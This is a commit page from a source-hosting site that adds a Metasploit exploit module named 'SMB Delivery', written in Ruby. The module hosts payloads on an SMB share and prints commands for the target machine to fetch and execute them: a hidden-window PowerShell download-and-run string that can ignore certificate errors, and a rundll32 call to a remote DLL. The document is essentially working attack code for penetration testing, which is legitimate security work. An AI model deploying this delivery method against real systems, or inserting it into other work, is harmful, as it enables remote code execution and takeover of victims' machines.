Browse Source

Land #7163, Add exploit payload delivery via SMB

wchen-r7 3 years ago
parent
commit
14a387e4eb
No account linked to committer's email address
1 changed files with 77 additions and 0 deletions
  1. 77
    0
      modules/exploits/windows/smb/smb_delivery.rb

+ 77
- 0
modules/exploits/windows/smb/smb_delivery.rb View File

@@ -0,0 +1,77 @@
1
+require 'msf/core'
2
+require 'msf/core/exploit/powershell'
3
+
4
+class MetasploitModule < Msf::Exploit::Remote
5
+  Rank = ExcellentRanking
6
+
7
+  include Msf::Exploit::EXE
8
+  include Msf::Exploit::Remote::SMB::Server::Share
9
+  include Msf::Exploit::Powershell
10
+
11
+  def initialize(info={})
12
+    super(update_info(info,
13
+      'Name'           => "SMB Delivery",
14
+      'Description'    => %q{
15
+        This module serves payloads via an SMB server and provides commands to retrieve
16
+        and execute the generated payloads. Currently supports DLLs and Powershell.
17
+      },
18
+      'License'        => MSF_LICENSE,
19
+      'Author'         =>
20
+        [
21
+          'Andrew Smith',
22
+          'Russel Van Tuyl'
23
+        ],
24
+      'References'     =>
25
+        [
26
+          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
27
+        ],
28
+      'Payload'        =>
29
+        {
30
+          'Space'       => 2048,
31
+          'DisableNops' => true
32
+        },
33
+        'Platform'       => 'win',
34
+        'Targets'        =>
35
+          [
36
+            ['DLL', {
37
+              'Platform' => 'win',
38
+              'Arch' => [ARCH_X86, ARCH_X86_64]
39
+            }],
40
+            ['PSH', {
41
+              'Platform' => 'win',
42
+              'Arch' => [ARCH_X86, ARCH_X86_64]
43
+            }]
44
+          ],
45
+        'Privileged'     => false,
46
+        'DisclosureDate' => "Jul 26 2016",
47
+        'DefaultTarget'  => 0))
48
+
49
+    register_options(
50
+      [
51
+        OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])
52
+      ], self.class)
53
+
54
+    deregister_options('FILE_CONTENTS')
55
+  end
56
+
57
+  def primer
58
+    print_status('Run the following command on the target machine:')
59
+    case target.name
60
+    when 'PSH'
61
+      self.file_contents = cmd_psh_payload(  payload.encoded,
62
+                                             payload_instance.arch.first,
63
+                                             remove_comspec: true,
64
+                                             use_single_quotes: true)
65
+
66
+      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
67
+      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
68
+      download_and_run = "#{ignore_cert}#{download_string}"
69
+      print_line generate_psh_command_line(  noprofile: true,
70
+                                             windowstyle: 'hidden',
71
+                                             command: download_and_run)
72
+    when 'DLL'
73
+      self.file_contents = generate_payload_dll
74
+      print_line("rundll32.exe #{unc},0")
75
+    end
76
+  end
77
+end

Loading…
Cancel
Save